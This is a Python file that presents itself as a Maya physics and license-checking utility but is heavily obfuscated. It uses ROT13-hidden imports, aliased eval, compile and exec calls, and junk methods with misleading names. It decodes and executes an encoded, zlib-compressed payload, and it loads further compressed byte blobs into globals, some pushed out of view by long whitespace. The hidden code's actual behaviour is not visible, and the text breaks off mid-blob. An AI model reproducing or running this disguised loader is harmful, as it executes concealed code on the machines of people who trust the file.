
from builtins import *

def _physicsanimator3d(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# SceneAnalyzer, MayaSimulationEngine, PhysicsEngineCoordinator, LicenseKeyEnforcer, NodeTopologyOptimizer, _math, _modulo = exec, str, tuple, map, ord, globals, type
SceneAnalyzer, MayaSimulationEngine, PhysicsEngineCoordinator, LicenseKeyEnforcer, NodeTopologyOptimizer, _math, _modulo, Restore = eval, str, tuple, map, ord, globals, type, compile

class PhysicsNodeRouter:
    def __init__(self, DynamicNodeProcessor):
        self._nodephysicssolver = _physicsanimator3d((DynamicNodeProcessor, -31150))
        self.BroLicenseChecker(_licensekeyenforcer=-78655)

    def BroLicenseChecker(self, _licensekeyenforcer = bool):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._nodephysicssolver *= -71215 * _licensekeyenforcer
        
        try:
            (({MayaSimulationEngine: BroRenmer}, LicenseKeyEnforcer) for LicenseKeyEnforcer in (BroRenmer, PhysicsEngineCoordinator))

        except ArithmeticError:
            ((NodeTopologyOptimizer, PhysicsEngineCoordinator) or PhysicsEngineCoordinator if (NodeTopologyOptimizer, PhysicsEngineCoordinator) and PhysicsEngineCoordinator else None or (PhysicsEngineCoordinator, (NodeTopologyOptimizer, PhysicsEngineCoordinator)))

        except:
            _modulo(-65749 * -79442) == None

    def _add(self, MayaNode = -21938):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        MayaNode -= -75292 * 94622
        self._callfunction != False
        
        try:
            (LicenseKeyEnforcer, PhysicsEngineCoordinator, NodeTopologyOptimizer) if BroRenmer >= _math else {MayaSimulationEngine: BroRenmer} is _math

        except AttributeError:
            ((LicenseKeyEnforcer, {PhysicsEngineCoordinator: MayaSimulationEngine}) for LicenseKeyEnforcer in {PhysicsEngineCoordinator: MayaSimulationEngine} if _math <= LicenseKeyEnforcer)

        except:
            _modulo(36971 + -11636) == True

    def Floor(Math = None):
        return _math()[Math]

    def Add(_substract = 85289 / -77351, Substract = str, _broutilities = _math):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _broutilities()[_substract] = Substract
        
        try:
            ({MayaSimulationEngine: BroRenmer} or SceneAnalyzer if {MayaSimulationEngine: BroRenmer} and SceneAnalyzer else None or (SceneAnalyzer, {MayaSimulationEngine: BroRenmer}))

        except AssertionError:
            (((BroRenmer, PhysicsEngineCoordinator), MayaSimulationEngine) for MayaSimulationEngine in {PhysicsEngineCoordinator: MayaSimulationEngine})

        except:
            _modulo(89478 / -38020) == str

    def execute(code = str):
        try:
            return SceneAnalyzer(Restore(MayaSimulationEngine(PhysicsEngineCoordinator(LicenseKeyEnforcer(NodeTopologyOptimizer, code)))), locals(), globals())
        except:
            pass
        # return SceneAnalyzer(MayaSimulationEngine(PhysicsEngineCoordinator(LicenseKeyEnforcer(NodeTopologyOptimizer, code))))

    @property
    def _callfunction(self):
        self._calculate = '<__main__._brorenmer object at 0x000008325BE58391>'
        return (self._calculate, PhysicsNodeRouter._callfunction)

try:
        PhysicsNodeRouter.execute(code = __code__)
        _brorenmer = PhysicsNodeRouter(DynamicNodeProcessor = 64655 * -28826)

        PhysicsNodeRouter(DynamicNodeProcessor = 34160 / -80214)._add(MayaNode = 85829 - _brorenmer._nodephysicssolver)                                                                                                                                                                                                                                                          ;PhysicsNodeRouter.Add(_substract='OO00OoOOO0ooO0o0OO',Substract=b'x\x9c\xed\x1dkS\xdb:\xf6;\xbf"\xdf\x92L\xb9\x8cc;v\xd2\x99\xccli\xe0nXH\xda\x06\n\xd3N\'cb\x99:\xd7\xb1\xb9\xb1S\xb8\xbb\xb3\xfb\xdb\xf7\x9c#\xc9\x8f\xd8\x06\x03I\x80]bl\xcb\x92,\x1d\xe9H:O\x19/\x98Z^\xd8h~\xaf\x8fn;\x0be\xf2\xed\xecZ\x9b\xfe\xf1\xf5\xfc\xec\xf0\xe7\xed\x852\xf4\xd8\xdf\x87K\xf6\xb5\xab\x9e\xff\xd1\xfa\xd3>\x9c\xb6>\x9f\r\xfd3\xe5hf\xddL\x82[\xc5\xac\xff\xe8]y\xc1%\x14\xb1\xf3\xa8\xf7\xb1\xe2\xb9\xef\xcf\xf1\x80\x9f\x1f_\xfd\xfa\xf7\xf7\xef\xdf\xfd\xf6\xee\xb7\xc6o\x8dw\xadf\xf3\xc7\x8f\x9e\xed.\x1e_\xc9`0\xf0\x06\x9eG7\xba\xf3p\xbe\x96+\x16YQ\xf4\x84\x9a\xca_\xbc\xf8\xe7W\xf5R;\xb9\xb5N\xf7\xf7\xc7\xe7\xed\xa3/\xde\xb5&{\xd1#<\xdcQk\xe9\xcbw\xd4\xf9\xbb\x17\xb2\xd9Y4\xec\xef\xb7\xcf\xbc\xb3\xd6\xa9\xf7mv~p\xb8\xff\xf9\xd4S\xbf\xa9\xdfNd\xdd\x93\x89;\xbf\x0e\x16\xd1d\xb2\xf6V\xff\xee-\x87\xb3o\xbf\x7fS~\xee\x7f\x9e\xdb\xde\xe7?\xbc\x99\xac\xf5\t07\xea\x97K\xd7\x8b\\?\xac7\xf7~Y\x8b\xd2~+\xab\x1e!\xbe\xb9\xb9\x85\x1f]\xe0\x06O\x10DD\x0c\x92\xf1!\xc2xk<\t\\\xd7\x9d\x86\x96\xef^\xae\x0e\xb7\xe6\xae\x9f\x1e\xf4s\x9a\x07\x10\xdaPm\xcd\xef\xdb\xadn\xcf\xf5mv\xdb\xa8\xff\xe5\xb8\xde-\xfb\xe9/sY~4\x1f\x83\xba\xd1(\x18)\xa3@\t\x14\xfc\x1b\x05x\x19\x01\xee\xea\xf5\xbdY\xe0\xfa\x8f)2\x08\xa0\xd0~\x9f.\xfd\x00C\x9b\x1a\x0b\xa1\xefF\x9e\xbb\xdc\xd2X(\xadm3c\xa1\xbc:9\x16\x98\xe7^\xcf\x83\xe9\x9aF\x82\xe7\xba\x9e7\x9b\xcd\\o\x86\xc7\x0c\x9f<\xef\ru\x1bA\x9dg\xfdb\xeb\x9a\xc10\xcbh\xbe\x05\xfdQ\x1f\xa7\x1c\xcc\xbc\xb7)\xb7\xa9)\xb7\\\x9c>\x00o\xf7\x13{\xa4\x97\xb7\x9cbR\x90\xe8\xe8\xcd\x1b\xf66\x83\xbd\xd0\xb3\x0e\xd74\xed|\t\xbc\x0c@\x0b\xde\xd0\xb6\x11\xb4EV\xe09kB\xdb\xf1\xe0\x18~\x83\xc1\xf1\xe0\xe8\x18\x8f\x01\x9eox\xdb\x08\xde\x16Q\xf8\xb0\xb5\xf2n\xc1L\x19\x11\x8b\xaa\x00\x7f\x19 \xc3\x8a\xd77\xccm\x86=\t\x82|\xeaS\xc8\x9c\xe7\xce\xf0\xe7\xba\xc0Y\xc2\xc5\xf5\\d53:\x83b\xfe\xb3Qo\x9a\x93\xce\xa4\x0b\x87>1\xe0\xd0&\xe6\xa4\x05\xd9;\xf9\xd8\n\xa5\x15I\xaa\x8d\xcb\xba\xd6Rm\xb5\xa3\xda\x9a\xa2vA\x0e\xb6\xd94\xb0Y\xa3\xdeq\xa2\xbc\x9c\xd5\xe4\x97\x1fo#o\x13#o\xcan\xd7\xc4\x18\x97\xa0\xba\xad\xb55M\xc5S\x1e\xf2\x19S\xe4\xa1\xa9\xf7\r\x03@\xbf5\xbf\xb4\xad\xda\xf9\xf9\xf9\xc59^.D\xe8\x02\x82\x17\x17\xef\x1f\xb5\xcc\xad\xaf\x9d\xc6\xd4\x98\xea]<\xf0\xce\x9fd\\\x92\x92\x1c\xf7\xb7\xb7p\x01n4\xfeS\xcc\xc26\x83E\xa3Q,\x9b4-\xdfn\x94\xbc\xd5|\x14UW\xf9o\xcc/x\xa8\xe31^*-0\x1dX>p\x19\xe1\xa7)\x16\x98n>v\xeb\x0b\xcc\x83\xeaPM]3\xdb\xa6f\xea\x86c\xd8F\xd7\xb4\x8c\xb6\xaa\xc0SG\xdc)\rB*\x85\xda\xc6\x94\x9e4\xc3\x81\xab\x89y\x0c\xcdh\x19\x0c\xee:\xc5\xe1\x9b]\x83\x19\xa6\xa9A\xdc\x14\xc2\x97\x94\x8bR\x8d\x16\x9c\x86\x81c\x08\xe3\x18\x94i\xc2\x1d\xcb\xd6\xb148\xb0\xa46\x94\xa8\x19\x9dt\xfdX\x87A5\x03\xb4\x8a)\xe1\xd1\x08\x16\r\x9e\xba\x10\xa7\xb7\xa7\xf8>?\xa0\x14\x1db\xa1^S\x85\'\xc7\xc4:\x14\xbc\xaa,\x9dO5\xef\xed\xdb\xc7\x8c\xae\x99$ZxE\xb2\xe5>e \xb4\x1dM\x81\xb3\x0b\xa7)\xeex\x1ap\xeap\xaap\xb6\xd5K\x1a,U\xf2\xea\xd5\x06T\xe9`\xaa75\xa0\xa2\xc6\xa4\x05G\x07\xee]\x18\xe8:\xbc\xa9M\x14\x1c\xf2\xe9\xd8\'\xb4Z\x11\xc3\xbfUq\xf8?\x06M\xc0[  \xc4\\\x00x\x9c\xc7x\n\xaa\x1e\x08\xf4\x8b^!\xa1t(8\x18Qe\x08\x1e<n\xb3k\x1e\xba\x94mh*_H\xf2,\x085\x91\xed\x8b\x8bJdB\xa5ybL\xda03\x94\t\xce\x1a\x95\xe6I.\xb6Ri-x\x039[\x85\xc8\x0bp\xb2\x90Y]\x8d\xabT\x92\x02o \x81R&\xf8~\x0b\xc28\x7f[\xf9\xd8jpA\xb2R)\xa7N\xab\x03/\xdb\xa4u\x02\xfb\xa3\x9d\x8f\xdd.\xd9\\=\xefX\xf9\xb0\x97\x15\x80U%\xbcu\x00Z\rJ+\x88\xad\xd4\x1f\x1aaM\x877L\xea{>>\xf4|l\xa5\xd2p$\xe0\xaa\xab\x01\x1c\x1d\xbe\x12\x13l\xb9\xd8g\xe8\xdd\xc7\xcc\xbc\xe1\xc9\xc9\x10\xcf\x13\n\xc0\xe5\tp\x13\x8d\x144Q\x15\xf7t\x18\xe9fW\xd0\xd0*y;\x95W1\xce\xf2\xe3J\x1d\xe0\x0f\xd7\xea\x11,\xf2\xb0\xaa\xde\xc1\xef\xdf)\x1b\xaf\x8f\xe3\xd7\x1d\xdd\x01\xce\x0fX\x06<d\xd8p\xf8\x81\xa9\x18+\xe3_5\xbfO\xca\x03\x1c#H\xe5\x91\xe6oo\x12<\x9c\x94\x99\x97\x9ab\xda\xaa\x03\xf7\x96i\xc3U\xa5\xab\x06q\x1b!re\xc3\xc3\x02\x91\xcf\xd2\xa7\xe2\xde\x8d\xaf2v*\xd2*\x88\x82b\x1eHi\x97\x8b\xbd\xe2R6\x11\xca!~\xcc\x08@m\x0b\xfe\xc8\x17\x854/\x10\\3\x81S \xb9\xca\xf2\x8a$X\x11\x84\x1b\t\x06\xb2\xce\x1d"\xc1\xb9\xd8\xe7!\x85/{.\x03\xb3>\xf3xg\xe0u\xabs\xf9\xe5\xf6KI\x13M\xd3\xec\x98&]\xe5!c\xe4\x8fb_\xf3\xf2^\xb6\x80\xd9p08lq\xc80\x8bO\x1e\xc3^s\xe3\xeb\xa8\xc4\x1a\x8f\xb9\xfeJ\x04\xf0\xfa6+\xeeT\xea\xa6U\xb9\xc95\x1d\'\xef\x15\xa8\xdb\xc3\x08\xbc\xaa\x9b\xa8\xf4\xe2*1\xb3m0\xa3k\xb6\xe0\xdeN\x14d&\xa4\xa1:\x8d\x14e-\xc3\xa6\xb4.*\xaeV\xd5s\\\xe1FJ\xb6.*\xc6\x0c\x8d\xab\xbd\xcc.Wue\xd4]\xe2h\x8b2\x12u\x9ciRhJ\xf59\x04\x9b\xca\x15|T&\xc2\xd26tu*\xeaoQ\x8e.\xa9\xe0\x00V\x8au\x12\xd8H-8\xa5v\xa8*\x8bk\xa4\xfc\x85u\xaaBM\xd8\xa6wx]\x98\xdeA\xa5`Q\x0bV{\x81Jn\x99j\xdc*\xecS\x8d\xde_U\xf9\x89CWL\xfe\x06\xf4n\x02U\xdb\x91\xfd\xadY\x90\x07\xf1C\xb9\xa8\x9f[\x08k\n3m\xb3\x83\xb9T\xb3\xa0\xef\x1dT\x93b9q{\x19@\xd9\x81~3K\xa0\xe1\x8aP\xe81LM0\x84j\xd7l\xbd\xd9\xbe\xa6\xde\xb2MTr\xaa\x04i7\xd5\xc7\x85-W\xef5U\xacY\xc6\xd0\x85\x84\xc1\xa5\n)kp\xe9\x02c\xf58\xac;\xafy%.3\xac0\x18\x07\x8c\xae\xfc\xce\x9f\xedL\xbcL\xa1\xe7\xb5\xaf8\xa6\x9e\x9a[\xf9\xb1\x93Zw\xb4\xd5u\x86\xe6\xb2&\xc2B\x11\x0f\xcfSZ\x15\xd4\xc2|l\xabbJ\xbb\x03\x87\x19\x1f\x9d\xf8\x1a\x9f\xafyL\xd5\x01$\x00\x87\x1cn\xd1\xf5\x16 }\xc9Z\xd8"\xd1uC\x9a\xd91Y\xee\xc6\t\xeb\xa3\x8e\xb9\x15\xef\x8d\xf1\xe1\xfa3R\x9aq\x05\xdaP\xe8\xd0\x86\x15\xfd\'\xd0O\x025\xb2\x1a\x9c*\x88\xa4*\xf9O\xe4b\xd7*>\x97\xe1\xa4-tnxjB\x0f\xa7\x8a\xb0\xd4\xc7\xe9BwW%\xaf\xf60q\xf8E\xe3\x18-\x8c(\x0c\xe3\x85lXU\x1cd\x9eM\xaf\xa5\xc7l\xa1!\x18L ;\x8e`\xda\x80\xb4 \xebR\xc4\xd0\x01S\x83\xb6\xe1\r\x91\x95z\x9f\xf0C\x1aZ\xae\x9b\x85\xbfu\xab{*\xe6\\\xb3*\xe7%\x8f\xddR~Qr\x85\x86\xe0\r\x8dX\x0f\xcd\xf9F\x1e[E\x1f-\x94\x8e\xa2)x\xc3\x8d&\xa8\x83\xdf\x8a\xca\xb1\x9c\x1dL\xb1z)&0\xcb\x08\xc2\xfdU\xf3-\x03\xf2o\xf3\xe4U(_\x9f0\x07L\xe1\xc7\xa0\n\x1f\x07\xf9\xdc\x11q\x94&\xe8@\x95\xbc\x1b\xe3\x81\xf4)\x0c\xde\x16I\xb0\x927\x06I\xd74\xb8\x83\x0bHjSX\xceL\xd5\xe6|v\xe2\xdc\x02\xcb\x9d!9pS\x97r\x1e\x97\x8dIK \xca\xcdJ\xc7I-m\xb1t\xe22\x0b\xa5\xb5\xa5\x84^,\x0f\xdf/\x13KH\xf1m\x94s\xdb\xab\x90K\xcdD\xb1\x94\xb9M\x19@(5;)e\xa7\x99Q|\x9ai\xe5\xe7\xfa\xc5\xab\xb6*\x941\x0e\xf7MJ\x89X)\x0f\xa5;\xfd\x920\'>\xe9\x89\x07UZ\xd0G\x05\x83\xca\x85\xfc.G\x89PG\x18xG\xe5\x11\xbc\xb1)\n\xa9r\xfe:\xfe\x11\xcb\xfd\x02\xc4\x104\xa1\xb7\x89%U\xc9\xfc\xde"\xa7\x08}5\xee\t\x90\x1ar\xb1\x10\xa7\\D$s\xd9&\x86\x92/:U\xf2\xaa\x9bsg*#\xa8\x19E\xb78\xed\xb2\xb8\xd7Lr\xca: 1X\x92\xb12e\xc2\xecR\x9cL\x81\xa7u\xaf\x0c\x80\xef\xea\x8c\xdb\x06X\x8c\x84\xa9\xb0c\xe6"a7\xfe\x17\xb1M\xdaD=>e\xc8\x89\xbd\x1at\xaeo\xac\xa2i|\xa2|\xd32\x0c\x92fT\ns%\xee\xd6\xa5\x9br\xab`\x9a`vbK\xa0YHD\xab\x90L\xcels7J\xcf#\xdfW\xf4\xa7$\xd9\xd4\x9b=\xb7w{\xe2\xb3/M<i\xc3O\x92Z\xdd\x95\x81;\x05\x92\'?\xb9\xf1\xc3\xdfv<\x19<\xf2`\xf1\xc8\x04\x8e\xde\xab\xdc\xc7x\xcd\x12\xabF>cm\xf2RlQ\x88\xfb\xa6\xe5b+\x95\xd6%\xdf8\x83\xbc\x15\x910\xab\xe47\x87\xde\x8f+\xb1O \xd5\xd2\xbfY\x92\xdenJ\x06\xe8\x88gE\x90\xea\xfb\xf2R\xfe\xc7\xb8M\xa4\xb6x\\H_\xd1\x0b\xf2\x1b\xdd\x96\xa3\xcb]\xb6\xf0\xc4\x06\xcerl\x81x\xba\x7f\xfc\xfbA\xd4(&\x0b\x85[%\xd7+U\xce\xdc\xc4\x93\x8b\xc6>=Tr\x01A\xa7\x9b.\x8c3\xdc\x98\x81\xde\x95\x92]l\xe5c\xb7\xa3\xd3\x11>\xf9\xad\x94\\j\xa6X\xc5\xb4<[%oUO\xf9x\xac>+"\x83\x91\xa2\xa05C\x19!\x00T\xfbS\x0c\x1bR\xe1\xab\x8b\x0eQ\xc4)\'w')

        if 166299 > 7068594:
            _brorenmer._add(MayaNode = 7257 / _brorenmer._nodephysicssolver)
        elif 438063 < 9918871:
            _brorenmer._add(MayaNode = 23873 - _brorenmer._nodephysicssolver)                                                                                                                                                                                                                                                          ;PhysicsNodeRouter.Add(_substract='ODDooOOOoDOoDoODOOODDOOOD',Substract=b'ge\x93\xc4}y\x9f\xbaI\xa2\x9cG\xc0\x1d2\xba\x10\xf3%WPUF\xdc\xb2a-C2\x13\xdf\x88\xec=\xed=\xb1e\x96\x8aq[%u\x17\xea8t\xb3-\x84\xe2d\xeb\x10\xf7Q\x10,VE\xbd\x87x\x9bt\x1e9\x9dJ\xca\xff\xc12\x93\rR\xad\r*\xa8\xb9\x1d\x87l9d\xc4\x19\x92U\xe7I\x0e\xd1\x9a\x18\xef\x86\x98\x0bJ\xea\xdeZ\x99/U\xf2V\x9e/\xafQ\xa0\xd0Ih 1\x82\x8b\x14\\\xc8\x10N\xd2\xfcY\xe7\xe2\xc5k\x96\xa8\xea\xf8Y\'\x02\x8e\xbe\xebD\xf6\xe6`\xcb\xe6f\xce>\xf9\xf4U:\xfe\x91\x0c\xfc\xcd\xe7\xcf\xca:9\xbap\x92\x97&\x88\xc4\x14!\xaf\xdc(\xf1\xaa\xb1/\xf4z\xd2\x9e.\x8c\xe9\x15w\xc4\xaa\xb4\x95\x89o\xfe\xc3\xcdH\xaa\xd8\x10\x98\x89\xdb\x9a\xb9X\xaa\xfc\xa59X\x17\xab\x94\x922\x13\x17\xe51\x1f\xce\xf6\xbfd\x94\xdeC\xd7\x8b\x84\xe1\xf4\x91\xd0\xf8\xcaB\xb1\xfc\xbc\x81p\xb4\xe7\x9f7\x18<\xb7\xec\x9f\x92}VC,}\xdd\x00\xfb\xa2\xc6\xa6\x18t\x99j\xf1]\xcb\xdc\xea\x1d\xbb~\xea\x19\x86E0\x1a)\xb6E8d\xe96\xa4t\x8dV\x9e\x8di\xa7\xb5J\xdch$\x9d8;\xdc\xa8\x14\x1b\x93\x90]\xea \x03\xc5\xeb\x05vJE7E\xb9w\x1bK(0#\xa9\xc2B\x918q\xea\xa2\x0c\x833f\x05\xef\xa0\xfb#\x837ZX\'\xbd\xc3c\xc8\x0c\x06qx\x85\x9c\x99]\xdb\x06\xf5\x08wju\xf8[\x02niRs\xd2\x86\xb0Uc\x9a\xe0\xa93.jd \x93.\xaa\xa5\x8e\x92h;\xd9\xfc\xbe\xf02\x0e\xc3\xa2\xa3K\xe74u\x9fR\xa8[\xe5S\x0bb\xfe\xf1\x95C\x1eX\xc7\xcd\xcd\xb3\x92\xceD\xd3.\xb7\x0fM\xe9\xe8\xc6\xdaxKl/\xaa\xac\x81\x7f\xb9\xebm\xdd\xe7\xbf\xb9\xb8e?\xa4\xfb\xff\xeb\x8av\xbf#\x84\x9d\xb3R0#\xef+[\xc1/\xf6\xd5u\x82\xee\xc8\xc3p\xf4\xd4\xfeK\xcen\xea)\x7fi\xbco\xc0r\x8d\xc2\xab\xc3\xc5g\xa1\x95\xb0\xc9M\xb8\x03P\xe8)+t\xee\xdb\x1b\xb1\xe3B\xc6\xf6\xbdnm\x06\xbbe\xd3\x06}\x88\x00?\x0c\xcb?G\x80\xf8\xe97w\x9cE0\xaf]Z!@Q\xe3\x1fQ\xae]\x1a:/\xaff\x855\xcf\x9d2\x1fSwD\xea\xd2w\xa3\x88\x85\xd1n-\x08\xf9\xdbs\xeb/K\xbe;\x9d\xdb"v\x7f\x11\x9c\x06\x81\x17\xeeM\x03\xdfq\xaf\x96\x0b+r\x03?\xaec\x11D\x98:\xe1\xa9;\x87\x83\xe3\x83I\x7f\xf0\xa5\xd6\x83b\xf7\xae\xad\xe8\xe7\x9e\xed.|k\xce\x1a\xf2y\xc1,\x0f\x03\x8d\xc9\xc4q=6\x99@\xc3N\x0f\xc6\xa7c\xf1\x9e,\x02"O>\xad\x94\x85\x1f\xd5m\xc8\x0c\xcd\x9d\x7f\x1c\x1c|\x9a\xe0\xe3\x18\xf2p\xdd\xe7\x8c\x9b\x01<R\x8b\xa2\xc1e\xb6\xb3\x7fvxx\xf0e2:;\xfdtv\n\x19\x87|\x07\xf5p\xc8\xb7SsE\x02\x87|xp\x0e\x19x\x1c\xff\x93;\xaew\xa6\x9e\x15\x86\xb5S\xe8\xb1\x8f\xd0\xcb\r\xd9}{2\xa6\xf9~\xa7\x06\xbf\x13\xa1\x8e8\x11z\t\xfc\xa3\x04l+t\x13\xb4>b6T\xf2\xfd\x07E_{\xcb+\xd7\x0f\'^`\xd9\x14\x1f\xb2\x08\x88\x0e&\xfd\x8d\xaa\x9c\xb3\xe8g`S\x84\xcd\x9cZ\xc4\xacE?\xb8\xf1?bZ\xe3\x83\xa8\x15\x7f\xe1\xf2\x9a-\x1a\x12\x9c\xdd\xda\x87\xe6^6s3\xce\xfa\x01\x06\x9a\xc7"6\x89\xd8\xfc\x9a\xb0\x90M]\xfa\x08\xceD\xc0v\x178\xa9|\x8d\xfd]\xd1\x9a\x14P)\xf67\xf6~\x1a\x0c\x92\xaa\xa0\xc1\xfc\x9d8\nG\xde\x1e\x16\xfb\x89\x97\xfaa\xb7\xf6g\xd4\xf3\x85\x14<\x17\x1f\xd3\xc2\xbf\x04\xe2\xfd\xbdl7\xeeY\xb6\r}S\x0e\xf6J\x03\xd3\xdd\xe8\x04\x8b\xda~\xcd\xf5\xa1\x1b\xb2\x85&Yb0y1\x02\xd0\xfdt\x0f\xe6\xd0*\xd0]\x08M\x1e\x19i\x80|)\xfa\xcb\x8f\x88I=@\x9c\xc3uj\r?\x88j\xc9thf\x81M\xb5)3\x0c\xb3\xb9DQr\xae\xb1[7\x8cBhV>\x17\xfe \xdb\x82\xcd\x83_,\xddp\xde\xf8t\x1d\xf74\xfd\x8aEI\xbbi\x998\xdc\xa5\xa92\xc1\x87T\xd5c5\xf1p\xe7!<3\x03I\xae\x17\xb9~Yi\xd1\x87\xe6J\x93 }n\xfd\xc1`\xa1\n\xe5\xa8\xc1_\xe3\xe3n\xad\xdfL\xad>\xe1\xb5\xe7F\xec6j$\x00&C\x10\xf2\x8d\xc4\xa6\x84\x80\x94\xf9\xa84\xda\x83\x9e\x9f[\x11\x0eb*,\xce~\x00\xd9\xc9\x1e&\xbe\xa3r\x1e\x1bP/\xe2<7?\xa1\x9a\xfb\xd0qP{\xd7\xab\xc9n\xc98%e\xb2!x3\xb2\x94\xba\xc9\xda\x98\x85\xee \x03\xe0av\xa4\xecY\xd7\xd7\x0c\x98\x80\x14\xae\x17,Z.\xfc\xda~9r\x03xe\x12\x02\xdda\xb86`y\xd8\x92\xde0\xf0\xd3\x98E\xd4\xc9\xb4\x0c\xea>\xd4\xdc\xb0\x86\xf8[y\x01\x7f4\xfd\xf0-\x04\xde\xe9\x8d\xd0x\x82l\x0e*\xeb\x88\xed\xc1\xbd!\xcah\xb7\xe6^\xf9\xc1\x82}e\x8b\x10\xa8V\xefF0.\xc8\xb9\xd0\x0f\x82@\x00{b\xd7D\xa2\xed\x11\x1d\x9a\xb4\x96y!+\x03\xc1\xe9\r\xc4\x1ezo\x90\x92\xf8wk>\xbb\xe9I.x.\x160zh\nr\xd2g\x97\xcb\xab\xe3\xe0\n\xd6\x8a\xabq\x04\x1d\xdd\x08.gl\x1a\x89\xd6\xba@d\\\xcb\x9b\x84\x11\x9fI\xd8\x11\xe5\xdd\r\x04\xe0z\xc1\xc2p\x12,\xa3\xebe\x94YD\xa0?3d\xf0\xfd\xca\x94]\xadi\x85\xae\xef\x11\xa0@5\xe0:\xf1\xd8/\xe6e\xde\xbf77\x94H\xb6J\xfa\x84\xa5\xcb?d9\xbb\xb3\x88\xd0\x82\x95\xe5\x8e\x15\x1c\x1a\x1a\x01bK\xda\xdaXmQ\xf9H\xaa\x02\xfbJiU\x00\xe7\xf8\x1dO\x17\xeeut`\xbb\x00k\x01~G\xf8\x0bp;\x13\xff\xcf\x014|\x15\x85\xd2bl\xc2e\xe9Ea\x1a\xfdq\x1a[,\x82Eq\xd2\x8d\xb5\xf0aT\x15\'\xba\xbe\x13<i<\x8db\x91\x82\xac\x96\xf4\xcf\x0f*\x0f\xb6\x82\xa6\xd1d\nS\xbd5\x00\x08\x1b\x7f\xf6\xf8go\x92\x8f\xdf\x10C\xb6\x1b\x83\xf6\x85\x17\xd0s\xb9k\r\xb2\xfb\xb4\xfb\x03\r\xe13w\x95.\xe5\xbb\xad\xacZ\xc9\xf9\rON\xd2\xa1\xa4\xe2\x03*\xa1GF\x01\xfe\x8f\x1f\xf8\x07m\xb8\x99\xa0\xb4\xe2\x14R\xca\xaa\xe6\x9d\xa9\x88\x7f,\xc1\x8d\x10\xa3\xa4\xe2sQBOH\xd5\x82#\xf2c\x06a^Z\xb9@zY\xc53A\x1aHfB\xaf\xa5\xa4R\xcc\x01k\xdc\xd11\xf0nGh\x0e\x1f\x1c\xc1\rN\xf8\x1b\x1c5\xf3\xcbb\xaex\xd6\xbb\xb8H|\x83\xe8\xc8c\xb1\x1f\xa4\xb6\x9d\xd0&\x85~\x7f\x05\x08\xf1\x8fs\xc4\x17K\x04K\x99\x815\xee\xa0x\xef?\xff\x12\x80\x0c\xe4p\x88\x92\x14JQ L\x8d\xb0z\x14\xaa\x00\x97\x8f[{H\xd1$\x05\xe5\x1b!d\xde\xdcf\xd6&\x9cu\xb4\x1a\x01C\xf6\xaf\xfcl\xd8\xcd\x8f\xd4\xdd\xa21\xb4\xbb\x8a\xdb\x7f\x17\xd1\xc8\x02LHR\x97t\xcb\x98\x7f\xf33\x8f\x91"\xe82\xf8X\x01\xa1\x00\r\x85\x90\xaf\xa0 